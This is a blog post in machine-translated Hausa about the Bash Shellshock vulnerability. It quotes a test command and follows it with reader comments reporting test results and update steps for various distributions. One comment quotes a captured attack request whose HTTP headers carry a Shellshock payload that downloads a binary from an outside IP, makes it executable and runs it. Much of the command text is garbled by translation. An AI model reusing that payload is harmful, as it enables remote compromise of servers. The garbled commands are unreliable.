Yana gudana kamar wutar daji a kan wasu shafukan yanar gizo, labarin abu da aka buga a cikin tsaro blog de Red Hat game da yanayin rauni da aka samo a cikin Bash saboda rashin amfani da masu canjin yanayin duniya. Dangane da labarai na asali:
“… Rashin lafiyar ya samo asali ne saboda yadda za'a iya kirkirar masu canjin yanayi tare da dabi'un da aka kirkira musamman kafin su kira shehin bash. Waɗannan masu canji zasu iya ƙunsar lambar da ake aiwatarwa da zarar an kira harsashi. Sunan waɗannan bayyane masu canzawa ba shi da mahimmanci, kawai abubuwan da ke ciki. A sakamakon haka, an bayyana wannan yanayin rauni a mahallin da yawa, alal misali:
- Dokar tilastawa ana amfani dashi a cikin sshd jeri don samar da iyakantattun damar aiwatar da umarni ga masu amfani nesa. Ana iya amfani da wannan kuskuren don kauce wa hakan da kuma bayar da umarnin zartar da hukunci ba tare da izini ba. Wasu aiwatarwar Git da Subversion suna amfani da irin wannan ƙarancin Shells. Amfani da OpenSSH na yau da kullun baya tasiri saboda masu amfani sun riga sun sami damar yin amfani da na'ura.
- Ana shafa uwar garken Apache ta amfani da mod_cgi ko mod_cgid idan an rubuta rubutun CGI duka a cikin bash, ko spawn sublevels. Ana amfani da irin waɗannan ɗakunan karafannin a fakaice ta hanyar tsarin / popen a C, ta os.system / os.popen a Python, idan kuna amfani da system / exec shell a cikin PHP (lokacin aiki a cikin yanayin CGI), da buɗe / tsarin a cikin Perl (wanda ya dogara da layin umarni).
- Rubutun PHP da ke gudana tare da mod_php ba zai shafe su ba koda kuwa ana kunna manyan abubuwa.
- Abokan ciniki na DHCP suna kiran rubutun harsashi don daidaita tsarin, tare da ƙimomin da aka karɓa daga sabar mai yuwuwar cutarwa. Wannan zai ba da izinin aiwatar da umarnin ba tare da izini ba, yawanci azaman tushe, akan na'urar abokin ciniki na DHCP.
- Daemon iri-iri da shirye-shirye tare da gatan SUID na iya aiwatar da rubutun harsashi tare da sauye-sauyen ɗabi'un da mai amfani ya sa / ya rinjayi, wanda zai ba da izinin aiwatar da umarnin ba da izini ba.
- Duk wani aikace-aikacen da ya lika wa harsashi ko gudanar da rubutun harsashi kamar amfani da bash a matsayin mai fassara. Rubutun Shell wanda ba ya fitar da masu canji ba ya da matsala ga wannan matsalar, koda kuwa sun aiwatar da abubuwan da ba a amince da su ba kuma suka adana su a ciki variananan masu kwasfa (hagu) da kuma buɗe manyan abubuwa.
… ”
Yaya za a san idan Bash na ya shafi?
Idan aka ba da wannan, akwai hanya mai sauƙi don sanin ko wannan matsalar ta shafe mu. A zahiri, nayi gwaji akan Antergos dina kuma da alama bani da matsala. Abin da ya kamata mu yi shine buɗe tashar don sanya:
env x = '() {:;}; amsa kuwwa m 'bash -c "amsa kuwwa wannan wata jarabawa ce"
Idan ya fito ta wannan hanyar ba mu da matsala:
env x = '() {:;}; amsa kuwwa mai rauni 'bash -c "amsa kuwwa wannan jarabawa ce" bash: gargaɗi: x: watsi da ƙayyadadden aikin aiki bash: Kuskuren shigo da ma'anar aiki ga `` x' wannan gwaji ne
Idan sakamakon ya bambanta, kuna so ku yi amfani da tashoshin sabuntawa na abubuwan da muka fi so rarraba don ganin idan sun riga sun yi amfani da facin. Don haka ka sani 😉
An sabunta: Wannan shine fitarwa daga abokin aiki ta amfani da Ubuntu 14:04:
env x = '() {:;}; amsa kuwwa m 'bash -c "amsa kuwwa wannan jarabawa ce" mai rauni wannan jarabawa ce
Kamar yadda kake gani, ya zuwa yanzu yana da rauni.
Ina da Kubuntu 14.04 daga 64 kuma ina kuma samun:
env x = '() {:;}; amsa kuwwa m 'bash -c "amsa kuwwa wannan wata jarabawa ce"
m
wannan jarabawa ce
Na riga na sabunta, amma ba ya gyara. Menene abin yi?
Jira su sabunta. An riga an gama eOS misali an sabunta .. 😀
Yaya ban mamaki, Ina kuma da Kubuntu 14.04
$ env x = '() {:;}; amsa kuwwa m 'bash -c "amsa kuwwa wannan wata jarabawa ce"
bash: gargaɗi: x: watsi da ƙoƙarin ma'anar aiki
bash: kuskuren shigo da aiki ma'anar `` x '
wannan jarabawa ce
Na kara cewa sigar "bash" din da aka zazzage a yau ita ce:
4.3-7 ubuntu1.1
http://packages.ubuntu.com/trusty/bash
A halin da nake ciki, bada umarni, kawai yana ba ni abu mai zuwa a cikin tashar:
>Koyaya, wargi shine na sabunta Debian Wheezy kuma wannan shine abin da ya watsar dani.
Wheezy har yanzu yana iya fuskantar ɓangare na biyu na kwaron, aƙalla na rana (UTC -4: 30) matsalar har yanzu tana bi: /
Kawai na tabbatar da cewa bayan amfani da sabuntawa a safiyar yau babu Slackware ko Debian ko Centos da abin ya shafa yayin da suka sami sabuntawa daidai.
Me ya sa Ubuntu ya kasance mai rauni a wannan sa'ar? Kuma ku gaya mani yana da lafiya: D.
Amma kun gwada sabunta Ubuntu?
Tare da sabuntawar yau sun kuma gyara shi.
OK
Masana tsaro sun yi gargadi game da raunin 'Bash', hakan na iya zama babbar barazana ga masu amfani da Software na Linux fiye da Laifin Heartbleed, inda 'masu fashin kwamfuta' za su iya amfani da kwaro a cikin Bash don karɓar cikakken iko da tsarin.
Tod Beardsley, manajan injiniya a kamfanin tsaro na cyberecurity Rapid7, ya yi gargadin cewa an nuna aibin 10 saboda tsananinsa, ma'ana yana da tasiri matuka, kuma an kimanta shi "maras kyau" don mawuyacin amfani, ma'ana wanda yake da ɗan sauƙi ga hare-haren 'dan dandatsa . Ta amfani da wannan matsalar, maharan na iya mallakar ikon tsarin aiki, samun damar bayanan sirri, yin canje-canje, da sauransu, ”in ji Beardsley. Ya kara da cewa "Duk wanda yake da tsarin da ya mallaki Bash to ya yi amfani da facin nan take,"
KAFIN WANNAN LADAN DA YAKE GABATAR DA Tsoffin kayan aiki (GNU) inda aka shirya Bach, zai zama mafi sauƙi ga Linux Software don kawar da GNU kuma canza ga kayan aikin BSD.
PS: karka Wulakanta 'yanci na na fadin albarkacin bakinka, ... kar ka zagi kowa, ... karka goge sakona kamar sakon da na share na baya!.
Oh don Allah, kar a cika shi. Ta yaya zan ƙi mutanen da suke amfani da BSD kuma suke ƙin GNU, Linux ko wani abu daga waɗannan ayyukan.
Ina tare da ku kuma kuna da gaskiya game da tsananin ramin nan.
Ba takunkumi ba ne, ya kasance ba a yin aiki (ku ma ku yi irin wannan tsokaci a cikin gnome 3.14 post)
«… Kuma an ƙididdige 'KARANTA' DON COMARRASHIN Xwarewar amfani, wanda ke nufin yana da sauƙin sauƙi ga hare-haren gwanin kwamfuta»
Shin rashin dacewar abin lura ne?
Ta yaya zai zama da sauƙi a yi amfani da yanayin rauni kuma a lokaci guda a sami matakin "ƙananan" haɗari saboda yana da rikitarwa don amfani?
Kwaro ne wanda aka warware shi a cikin awanni kaɗan na haɗuwa kuma wannan, kamar mai taushi, ba shi da rahoton ana cin zarafinsa (Tabbas, wannan yana da ɗan lokacin sanin juna).
Ya fi latsa tabloid fiye da haɗarin gaske.
Shin @Staff yana da mahimmanci a gare ku? Me za ku gaya mani yanzu?
SAMUN ./.HTTP/1.0
.User-Agent: .Na gode-Rob
.Kukie: ()...;;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Referer: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
Karba :. * / *
$ fayil nginx
nginx: ELF 32-bit LSB zartarwa, Intel 80386, sigar 1 (SYSV), haɗin intanet, don GNU / Linux 2.6.18, an cire
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Kun san abin da yake? Ba komai da hatsari ...
Halin yana da tsanani, amma daga can a ce ya kamata ku daina amfani da bash don zaɓin BSD, ya riga ya yi yawa, duk da haka sabuntawa ya riga ya kasance, Ina taɓa sabuntawa kuma ba komai.
Yanzu PD, ina tsammanin ya fi na abokin aiki @robet, ba na tsammanin cewa shugabannin da ke nan sun sadaukar da kansu don share tsokaci kamar wannan saboda haka ne, saboda, tun lokacin da na shiga cikin wannan al'umma ina da irin wannan tunanin kuma ina fata zauna haka.
Na gode.
Kuna sanya madaidaici daidai da sharhi akan posts daban-daban. Idan kuna ƙoƙarin tallata “asalin” labarin, kuyi haƙuri, wannan ba wurin bane.
Bash ya fito ne daga Unix (da haɗin GNU). Tsarin BSD kamar OSX ma ana shafar su, kuma a cewar Genbeta, ba su taɓa yin hakan ba tukuna. Hakanan, don samun damar Bash kuna buƙatar asusun mai amfani, ko dai na gida ko ta hanyar SSH.
@Bbchausa:
1.- An rarraba shi azaman Mataki na 10 (matsakaicin matakin haɗari) saboda yawan sabis ɗin da kwaron zai iya shafa. A cikin babban bayanin sun bayyana wannan gaskiyar a fili, suna jayayya cewa kwaron na iya shafar ayyuka kamar apache, sshd, shirye-shirye tare da izinin izini (xorg, da sauransu).
2. - An lasafta shi azaman Levelarancin Matsala, idan yazo ga aiwatarwa, kuma mafi kyawun misalin wannan shine rubutun gwajin rauni wanda @elav ya sanya a cikin gidan. Da wahalar aiwatarwa ba, kamar yadda kake gani.
Ba na ganin sakewa a cikin bayanin (kawai ina ganin fassarar Google) kuma idan matsalar ta kasance mai tsanani, kuma kamar yadda kuka ce, ta riga ta sami faci da mafita, amma ba don haka ba, ba ta da haɗari, kuma ainihin gaske.
@petercheco / @Yukiteru
Kada ku fassara ni da kuskure, ina tsammanin a bayyane yake cewa zargi na shine labarin da Robet ya danganta kuma yana mai da hankali ne akan rashin dacewar ba rashi ba.
Haka nan, dole ne mu bambance tsakanin haɗari da haɗari (ban ambaci na biyun ba), galibi muna amfani da su azaman kamanceceniya, amma a nan, haɗari zai zama damagearfin ɓarnar ɓarnar da haɗarin yiwuwar faruwarsa.
A cikin harka ta musamman, na shiga daga jiya. Ba don jerin wasiƙa ko wani abu makamancin haka ba. An yi shi ne don distro na tebur! Na dauki waya na tura sako zuwa sysadmin tare da mahada kuma na tabbatar da cewa na sami komai an min faci, to ku gafarce ni amma wadannan labarai basu hana ni bacci ba.
A wasu wuraren tattaunawar sun ambaci batun rashin lafiyar Bash, "maganin da Debian da Ubuntu suka saki", amma a yau sun gano cewa akwai raunin har yanzu, don haka maganin bai cika ba, sun ambaci hakan!
Na ga cewa mutane da yawa sun soki ni game da sauƙin gaskiyar hana mutane daga tsananin yanayin rauni - wanda ya cancanta da matakin 10 na haɗarin haɗari, da kuma ambaton hanyoyin mafita ga Linux Software kafin kayan aikin GNU wanda ba a daɗewa inda aka shirya Bash - wanda GNU daidai zai iya a maye gurbinsu da kayan aikin BSD a cikin Linux Software,… Ina kuma amfani da Linux kuma ina son Linux!
Na fayyace cewa Bash baya zuwa ta tsoho wanda aka sanya shi a cikin BSD, yana da ƙarin kunshin daidaitawar Linux wanda za'a iya sanyawa a cikin BSD ... ee!. Kuma ana sanya tushen don su iya bincika labarai, tunda yawancin masu amfani wani lokacin basa yarda da saƙon ko tsokaci.
rigakafi: Kamar yadda suka riga sun faɗa muku sau da yawa, kun riga kun sanya ra'ayinku tare da labarai a cikin wasiƙa, ba lallai ba ne ku sanya shi a kowane rubutun da kuka yi sharhi.
Game da bash, kamar yadda akwai sauran bawo da za a iya amfani da su idan Bash yana da rauni. 😉
Robet, da na sani babu wani software da zai haɗu da kernel na Linux tare da ƙasar mai amfani da BSD. Abu mafi kusa shine akasin haka, kBSD + GNU, kamar Gentoo da Debian. Bayan wannan, GNU (1983) ba za a iya kiransa "tsohon yayi" idan ya kasance bayan BSD (1977). Dukansu suna raba tushensu na unix (amma ba lambar ba), da ba za a sami "jituwa ta Linux ba" idan an ƙirƙiri Bash tun lokacin da Linus T yake yaro.
uff, gwajin debian a wannan lokacin "mai rauni ne" menene tarin da muke da shi ...
Ina amfani da Gwajin Debian kuma har ma a wannan reshe mun sami sabuntawa
bisa ga genbeta akwai kuma wani rauni
http://seclists.org/oss-sec/2014/q3/685
umarnin yin nasiha shine
env X = '() {(a) => \' sh -c "amsa kuwwa mai rauni"; bash -c "amsa kuwwa Kasawar 2 ba ta haɗu ba"
env X = '() {(a) => \' sh -c "amsa kuwwa mai rauni"; bash -c "echo Rashin Kuskuren 2" sh: X: layi 1: kuskuren aiki kusa da abin da ba zato ba tsammani `` = 'sh: X: layi 1:' 'sh: kuskuren shigo da ma'anar aiki don `` X' sh: mai rauni: ba a samo umarnin Rashin nasara 2 ba tare da yin faci baguda ni.
Haka nan. Amma asalin bug ɗin da ke cikin gidan an toshe a cikin (L) Ubuntu 14.04
Maimakon yin saƙo mai sauƙi, yi ƙoƙari don aiwatar da umarnin da ke buƙatar gata, sai na jefa kaina "ƙarancin gata" ... wannan kwaron ba ya haɓaka gata? Idan ba ta haɓaka gata to ba ta da haɗari kamar yadda suke zana shi.
Kunyi gaskiya !! sun kasance rauni ne guda biyu ...
A wurina a cikin Linux Mint 17 bayan sabuntawa ta biyu da suka sanya a cikin Ubuntu a cikin daren jiya, lokacin aiwatar da wannan umarnin harsashi yana ba da wannan fitarwa:
env X = '() {(a) => \' sh -c "amsa kuwwa mai rauni"; bash -c "amsa kuwwa Kasa 2 bai nuna ba"
>
Nau'in "bassh" wanda aka sanya a cikin wuraren ajiya na Ubuntu don sabunta waɗanda suka gabata shine:
4.3-7 ubuntu1.2
A kan tsarin Debian zaka iya duba sigar da aka sanya tare da wannan umarnin:
dpkg -s bash | fassarar grep
Koyaya, ya kamata a bayyana, aƙalla ga masu amfani da Debian, Ubuntu da Mint; Bai kamata ku damu da shirye-shiryen da ke gudanar da rubutun tare da taken #! / Bin / sh ba saboda a kan rarrabawar / bin / sh baya kiran "bash", amma yana ɗaure da harsashi "dash" (dash shine :)
Debian Alchemist Console (dash) ƙirar na'ura ce ta POSIX
na ash.
.
Tunda yana aiwatar da rubutun da sauri fiye da bash, kuma yana da karancin dogaro
na dakunan karatu (yana maida shi mai ƙarfi game da gazawar software ko
hardware), ana amfani dashi azaman tsoffin kayan wasan bidiyo akan tsarin
Debian.
Don haka, aƙalla a cikin Ubuntu, ana amfani da "bash" azaman harsashi don shiga mai amfani (kuma ga mai amfani da tushen). Amma kowane mai amfani na iya amfani da wani harsashi ta hanyar tsoho ga mai amfani da tushen consoles (tashoshi).
Yana da sauki a duba cewa harsashi yana aiwatar da rubutun (#! / Bin / sh) ta aiwatar da waɗannan umarnin:
fayil / bin / sh
(fitarwa shine / bin / sh: alamar haɗi zuwa `` dash '') muna bin sawun maimaita umarnin
fayil / bin / dash
(kayan sarrafawa shine / bin / dash: ELF 64-bit LSB abun da aka raba, x86-64, fasalin 1 (SYSV) don haka wannan shine zartarwa.
Waɗannan su ne sakamakon a kan rarraba Linux Mint 17. A kan wasu rarrabuwa waɗanda ba Ubuntu / Debian ba ne suna iya zama daban.
Ba shi da wahala canza tsoho harsashi !! har ma kuna iya amfani da daban don masu amfani da tushen mai amfani. A zahiri dole kawai ka girka harsashin da ka zaba ka canza tsoho tare da umarnin "chsh" ko kuma ta hanyar gyara / sauransu / passwd fayil (kodayake masu amfani waɗanda ba su san sakamakon kuskure ba yayin gyara fayil ɗin "passwd", Zai fi kyau su sanar da kansu sosai kuma kafin su gyara shi, suyi kwafin na asali idan har ya zama dole a dawo dashi).
Na fi jin dadi da "tcsh" (tcsh shine :)
Tensel na TENEX C, ingantaccen sigar Berkeley csh
"Csh" shine abin da Mac OS X yayi amfani dashi fewan shekarun da suka gabata. Wani abu mai ma'ana la'akari da cewa yawancin tsarin aikin Apple shine lambar FreeBSD. Yanzu daga abin da na karanta jiya, da alama suma suna samar da "bash" don tashoshin masu amfani.
Kammalawa:
- An riga an rarraba sifofin "bash" masu facin "don rarar da aka yi amfani dasu"
- "bash" version 4.3-7ubuntu1.2 kuma daga baya baya dauke da wadannan kwari
- Ba lallai bane ayi amfani da "bash" a cikin OS * Linux
- Kadan ne * hanyoyin rarraba Linux suka danganta #! / Bin / sh tare da "bash"
- Akwai wasu hanyoyi: ash, dash, csh, tcsh da wasu ƙari
- Ba shi da wahala canza tsoffin harsashi wanda tsarin yake kira yayin buɗe tashar
- smallan ƙananan ƙananan na'urori (masu ba da hanya da sauransu) suna amfani da "bash", saboda yana da girma sosai !!
A yanzu haka wani sabon sabuntawa ya shigo wanda yake girka wani nau'I na "bash" 4.3-7ubuntu1.3
Don Linux Mint 17 da Ubuntu 14.04.1 LTS
ArchLinux ya shiga sigar bash-4.3.026-1
@ Xurxo… .csh daga Berkeley?,… Kun fahimci wani abu daga abin da nake magana a sama, kuma ya fi kyau a yi amfani da BSD “csh”… maimakon tsohuwar kayan aikin GNU inda aka shirya Bash. Wannan kayan aikin shine mafi kyawun Linux Software.
Ina tsammani wannan kwaro ne
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
gaskiya?
Kuma menene mafita?
Jira musu su sabunta kunshin a kan distro 😉
Bugun ya yi baftisma a matsayin harsashi
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
m
wannan jarabawa ce
Babu faci don Ubuntu Studio 14.04 har yanzu
An gyara a Ubuntu Studio 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; amsa kuwwa m 'bash -c "amsa kuwwa wannan wata jarabawa ce"
bash: gargaɗi: x: watsi da ƙoƙarin ma'anar aiki
bash: kuskuren shigo da aiki ma'anar `` x '
wannan jarabawa ce
A zahiri karamin rauni ne, idan ya shafe ka shine kana yin wani abu ba daidai ba kafin ...
Saboda ba za a taɓa fallasa rubutun bash wanda ke gudana tare da gata mai tushe ga mai amfani ba. Kuma idan kun gudu ba tare da gata ba, babu irin wannan karfin halin. A gaskiya, wauta ce. Mafi yawan cin zarafi.
Ina ganin iri daya.
Daidai, don siyar da ƙarin jaridu ko samun ƙarin ziyara, waɗannan kwari suna da kyau.
Amma koyaushe suna mantawa da ambaton cewa don keta kwamfutar da irin wannan rubutun, dole ne fara samun damar bash sannan kuma samun ta a matsayin tushen.
ma'aikata idan kuna amfani da apache tare da cgi, kawai sanya a cikin kanun labaran http azaman kukis ko referer aikin da kuke son aiwatarwa. Har ma anyi amfani dashi don yada tsutsotsi.
kuma idan wani ya sanya harsashi zuwa sabar tare da wget mishell.php, a wannan yanayin ba shi da mahimmanci, shin?
Amince da kai. Ina tsammanin babban kwaro ne kamar wanda ke cikin Heartbleed (har ma da NSA ta ba da ranta don ba da wutar cutar), amma a ƙarshe ƙaramin kwaro ne.
Akwai wasu kwari masu tsananin gaske irin su mahaukacin amfani da Flash da faduwar aiki a cikin Pepper Flash Player, da kuma wanda aka riga aka gyara webRTC bug a cikin Chrome da Firefox.
Shin kun san ko tana da tsari ga mutanen da suke da Linux Mint 16?
A cikin gwajin Debian an riga an gyara shi.
A cikin 5 distros dina an warware shi, a cikin OS X ɗin ban sani ba.
Don Allah kar a tantance maganata, na ce OS X. Ban sani ba ko za ku iya cewa OS X akan wannan rukunin yanar gizon.
@da kyau dai kada ku fisshe shi da yawa saboda har yanzu suna aiki akan wasu bayanai na facin ... gwada wannan sannan ku fa mea mani game da XD
env x = '() {:;}; amsa kuwwa mai rauni 'bash -c "amsa kuwwa na fi rauni fiye da iphone 6 shara"
Cewa idan sun warware shi 100% kafin OS X zan iya cin komai
Da kyau, koda a cikin Ars Technica suna ba da mahimmanci ga Bash a cikin OSX.
@Yoyo sharhi na gaba akan OS X don SPAM .. lla tu save .. 😛
@yoyo can ka gyara zancen ... amma sauran ka sani 😉
FSF tayi magana
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Kamar sun zama masu tallatawa tare da OSX (saboda OSX har yanzu yana amfani da Bash: v).
Koyaya, ba lallai bane inyi rikici da Debian Jessie sosai.
Idan tsarin yana da rauni akan Cent OS:
yum tsaftace duka && yum sabunta bash
don ganin sigar bash:
rpm -qa | gaisuwa bash
Idan sigar ta gabata fiye da bash-4.1.2-15.el6_5.1 tsarin na iya zama mai rauni!
Na gode.
Rashin rauni na 2 har yanzu ba a warware shi ba
env amvariable2 = '() {(a) => \' sh -c "amsa kuwwa mara nauyi"; bash -c "amsa kuwwa Kasawar 2 ba ta haɗu ba"
Ana ɗaukakawa ...
Akasin haka yana faruwa da ni a Gentoo, Ni kawai mai saukin kamuwa ne ga gazawa ta farko amma tare da na biyu na sami wannan:
[lambar] sh: X: layi 1: kuskuren aiki a kusa da ɓangaren da ba tsammani `` '
sh: X: layi 1: ''
sh: kuskuren shigo da ma'anar aiki don `` X '
sh: mai rauni: ba a samo umarnin ba
Ugwaro 2 ba a goge ba
[/ lambar]
Ban sani ba ko tuni za a sami tsayayyen sigar Bash tare da gyaran kwari, amma ko ta yaya zai kasance a jiran lokaci na gaba da zan fito –sync && emerge –update –deep –with-bdeps = da - newuse @world (wancan shine yadda nake sabunta dukkan tsarin).
Ina da Gentoo mai sigar 4.2_p50 kuma har yanzu ya wuce dukkan gwaje-gwajen. Gwada fitowan –sync sannan kuma a fito -av1 app-shells / bash, sannan a bincika cewa kuna da sigar 4.2_p50 ta amfani da bash –version command.
Shin kun gwada wannan?
Kuma tare da sabbin abubuwa, sabon gwajin da Red Hat yayi
cd / tmp; rm -f / tmp / amsa kuwwa; env 'x = () {(a) => \' bash -c "ranar amsa kuwwa"; cat / tmp / amsa kuwwa
Idan tsarin mu ba mai rauni bane kuma anyi facin sa daidai, dole ne ya bamu irin wannan
1 kwanan wata
2 cat: / tmp / echo: Fayil ko kundin adireshin babu
Gwada wannan hanya:
env X = '() {(a) => \' sh -c "amsa kuwwa mai rauni"; bash -c "echo Kasawa 2 patched"
Na samu
m
Kwakwalwa 2 da aka toka.
Ka manta shi, layin an tsara shi da kyau.
Na yi kyau! Na riga na yi sabuntawa kan Slackware, godiya!
Barka dai, tambaya ta taso, Ina da sabobin da yawa tare da "SUSE Linux Enterprise Server 10" 64 ragowa.
Lokacin da na zartar da umarni ina cikin rauni, nima na zama mafi rauni fiye da kwatancen iPhone 6 xD
Idan banyi kuskure ba don sabuntawa / sanya fakiti a cikin SUSE an yi shi da umarnin «zypper».
A kan wasu sabobin yana gaya mani wannan:
BIAL: ~ # zypper sama
-bash: zypper: ba a samo umarnin ba
BIAL: ~ #
Kuma a cikin wasu wannan:
SMB: ~ # zypper sama
Tanadi tsarin hanyoyin…
Adaddamar da metadata don SUSE Linux Kamfanin Ciniki na 10 SP2-20100319-161944…
Lissafin bayanan RPM ...
Summary:
Babu abin yi.
Abin da nake yi?
Na san cewa wasu suna cewa yanayin larurar ƙasa da abin da suke zana shi amma ina da shi kuma ba na so in kasance cikin haɗari, ƙarami ko babba.
Na gode.
Barka da yamma, Na gwada gwada lambar da kuka bayar a cikin labarin, na sami wannan
sanders @ pc-sanders: ~ $ env x = '() {:;}; amsa kuwwa m 'bash -c "amsa kuwwa wannan wata jarabawa ce"
wannan jarabawa ce
sanders @ pc-sanders: ~ $
Don Allah za ku iya bayyana mani yadda zan yi maganin distro, ina sabuntawa a kowace rana kuma ban ga wani canje-canje a cikin fitowar da sauri ba.
Na gode!